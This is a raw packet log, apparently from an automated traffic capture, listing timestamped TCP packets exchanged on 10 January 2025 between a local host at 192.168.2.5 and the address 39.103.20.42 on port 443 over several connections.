                                                                                Jan 10, 2025 02:26:22.361743927 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.361761093 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.361789942 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.361855030 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.362508059 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.362575054 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.575203896 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.575336933 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.575376987 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.575442076 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.575486898 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.575515985 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.575695992 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.575737953 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.575746059 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.575764894 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.575795889 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.575817108 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.576533079 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.576590061 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.576607943 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.576623917 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.576649904 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.576670885 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.577302933 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.577347040 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.577377081 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.577387094 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.577410936 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.577430964 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.578224897 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.578264952 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.578291893 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.578306913 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.578334093 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.578353882 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.579056978 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.579116106 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.661591053 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.661755085 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.661818027 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.661885023 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.794719934 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.794877052 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.794940948 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.795027971 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.795161009 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.795212984 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.795214891 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.795228958 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.795257092 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.795274973 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.795547009 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.795586109 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.795603991 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.795610905 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.795629025 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.795649052 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.796045065 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.796127081 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:22.796160936 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.796180964 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.985749006 CET49706443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:22.985822916 CET4434970639.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:23.113465071 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:23.113502026 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:23.113574982 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:23.114037991 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:23.114057064 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.331490993 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.331573963 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.331907988 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.331939936 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.332091093 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.332110882 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787214041 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787266016 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787381887 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787431002 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.787497044 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787527084 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787528992 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.787607908 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.787625074 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787691116 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.787728071 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.787754059 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.788341045 CET49708443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.788372993 CET4434970839.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.805217981 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.805306911 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:24.805499077 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.805727959 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:24.805761099 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.074199915 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.074304104 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.074779034 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.074798107 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.075129032 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.075140953 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.450258970 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.450316906 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.450336933 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.450367928 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.450390100 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.450428963 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.450459957 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.450531960 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.451920986 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.451991081 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.455992937 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.456057072 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.542942047 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.543020010 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.543035984 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.543064117 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.543088913 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.543102980 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.543184042 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.543237925 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.543266058 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.543349981 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.544135094 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.544197083 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.544465065 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.544524908 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.546410084 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.546469927 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.546492100 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.546550035 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.548513889 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.548568964 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.635262966 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.635351896 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.635610104 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.635672092 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.635677099 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.635699987 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.635735035 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.635744095 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.635745049 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.635766029 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.635795116 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.635823011 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.636245966 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.636300087 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.636313915 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.636324883 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.636353970 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.636374950 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.636392117 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.636437893 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.637197018 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.637259960 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.637573957 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.637640953 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.638124943 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638176918 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638206005 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.638222933 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638254881 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.638273954 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.638674021 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638739109 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638751984 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.638762951 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638808012 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638818979 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.638853073 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.638865948 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.638916969 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.640856028 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.640906096 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.640921116 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.640932083 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.640960932 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.640979052 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.727628946 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.727739096 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.727845907 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.727889061 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.727889061 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.727889061 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.727955103 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.727996111 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728007078 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728060007 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728076935 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728101969 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728163004 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728174925 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728199959 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728239059 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728259087 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728285074 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728296041 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728353977 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728365898 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728415966 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728435993 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728463888 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728497028 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728519917 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728574038 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728641987 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728662014 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728724957 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.728880882 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.728945971 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.729012966 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.729073048 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.729095936 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.729159117 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.729492903 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.729564905 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.729588032 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.729655981 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.729671955 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.729737043 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732378960 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732501984 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732537031 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732562065 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732594967 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732598066 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732625008 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732635975 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732666016 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732686043 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732690096 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732707024 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732744932 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732769966 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.732908010 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.732965946 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.733031034 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.733093023 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.733213902 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.733284950 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.733333111 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.733396053 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.734961987 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.735040903 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.738951921 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.739022017 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.741122007 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.741205931 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.744965076 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.745032072 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.747068882 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.747117996 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.819820881 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.819899082 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.819926023 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.819948912 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.819991112 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.819991112 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820096970 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820157051 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820199966 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820256948 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820295095 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820358038 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820394039 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820466042 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820488930 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820545912 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820590973 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820652008 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820679903 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820753098 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820777893 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820841074 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820880890 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.820943117 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.820966959 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821029902 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821059942 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821124077 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821156025 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821221113 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821249962 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821317911 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821346998 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821412086 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821451902 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821521044 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821571112 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821630001 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821666002 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821726084 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821760893 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821820021 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.821841955 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.821904898 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.896028042 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.896107912 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.896718025 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.896792889 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.900338888 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.900429010 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.902126074 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.902188063 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.904145002 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.904242992 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.907733917 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.907802105 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.909501076 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.909559011 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.913218021 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.913288116 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.915021896 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.915091038 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.916893959 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.916977882 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.920527935 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.920633078 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.922384024 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.922456980 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.926001072 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.926079988 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.927897930 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.927968025 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.929753065 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.929824114 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.933367968 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.933434010 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.935086012 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.935158968 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.938724995 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.938790083 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.940571070 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.940634966 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.944101095 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.944158077 CET49713443192.168.2.539.103.20.42
                                                                                Jan 10, 2025 02:26:26.945946932 CET4434971339.103.20.42192.168.2.5
                                                                                Jan 10, 2025 02:26:26.945997000 CET49713443192.168.2.539.103.20.42
